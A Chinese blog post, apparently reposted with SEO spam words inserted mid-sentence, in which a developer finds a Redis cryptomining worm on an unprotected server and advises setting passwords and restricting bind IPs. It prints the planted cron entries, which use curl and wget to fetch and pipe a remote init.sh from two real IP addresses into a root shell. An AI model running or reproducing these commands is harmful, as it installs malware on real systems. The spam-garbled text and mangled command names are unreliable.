您现在的位置是:网络安全 >>正文
事实证明,互联网会惩罚每一个裸奔的人之 Redis 扩散病毒
网络安全9834人已围观
简介前段时间换了台电脑,一大堆开发环境我实在是懒得在本地搞了,每次启动来启动去太麻烦了,索性直接在服务器上开 Docker 部署,docker pull复制粘贴什么 Redis、什么 MySQL 分分钟装 ...
前段时间换了台电脑,事实证明一大堆开发环境我实在是互联懒得在本地搞了 ,每次启动来启动去太麻烦了 ,惩罚索性直接在服务器上开 Docker 部署,裸奔docker pull 复制粘贴什么 Redis、扩散什么 MySQL 分分钟装好,病毒要用的事实证明时候直接远程连接就行了,简直不要太方便 。互联
也不是惩罚什么业务场景让我发现了这么一个病毒 ,模板下载因为大部分 Redis Key 都是裸奔设置了过期时间的,开发过程也没感觉到什么问题,扩散纯粹是病毒有一天我闲着没事干,进入 Redis 命令行 keys * 看看,事实证明不看不要紧,互联一看好家伙 ,惩罚多出了几个 key,大概就是云计算下面这样子:
复制uid:1 uid:2 uid:3 backup1 backup2 backup3 backup41.2.3.4.5.6.7.多出了 4 个 backup 前缀的 key,我第一反应这肯定是什么备份文件
正常情况下我根本不会在意 ,纯粹就是那天确实比较闲,不如来学习下 Redis 吧(哈哈),于是 ,禀着好学的基本素养,免费模板我分别查看了下这里面的 value 是什么 :
复制*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh1.2.3.4.5.6.7.wget 是用来下载东西的 ,curl 是用于执行 HTTP 请求,点开 http://45.83.123.29/cleanfda/init.sh 看看到底是什么脚本文件:

又是改权限,又是源码库关防火墙删文件的 ,用屁股想都知道这 IP 肯定是国外的了:

查了下发现这是一种 Redis 扩散病毒 ,专门利用 Redis 未授权访问漏洞的挖矿病毒。没错,就是 Redis 没设置密码 ,服务器租用没授权 ,让病毒有了可乘之机。如果服务暴露在互联网上就一定要设置密码 ,不要裸奔 😭,很多同学大部分时间都是在本地开发 ,没有设置密码的习惯或者只是简单的设置成 root 这种
另外 ,除了设置密码,高防服务器服务器开放端口的时候最好也指定下 IP ,不然默认的 0.0.0.0:6379 任何 IP 都可以访问
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“商站动力”。http://www.noorid.com/html/968b899023.html
相关文章
2022年第十七届中国企业年终评选榜单揭晓: 绿盟数据脱敏系统DMS荣获2022年度中国IT行业软件创新产品奖
网络安全2022年11月,由51CTO主办的《中国企业 “IT印象◆激扬创新动能,掘金数字时代”年终评选》活动全面启动。依托互联网,本次评选活动主要从品牌、产品与技术、解决方案、应用服务等维度进行,通过媒体曝 ...
【网络安全】
阅读更多神舟战神K660D-i7D2
网络安全作为一款专为游戏玩家设计的笔记本电脑,神舟战神K660D-i7D2凭借其卓越的性能和稳定的表现,成为了广大游戏玩家的首选。下面将对该款笔记本电脑进行全面的评测,详细介绍其各个方面的性能和特点。一:卓越 ...
【网络安全】
阅读更多能源企业存在大量可被利用的安全漏洞竟浑然不觉
网络安全SixMap发布的一份新报告显示,美国许多大型能源供应商都存在可被利用的漏洞,而大多数安全团队甚至可能都没有察觉到这些漏洞。研究人员对21家大型能源公司的外部攻击面进行了评估,分析了近4万个IP ...
【网络安全】
阅读更多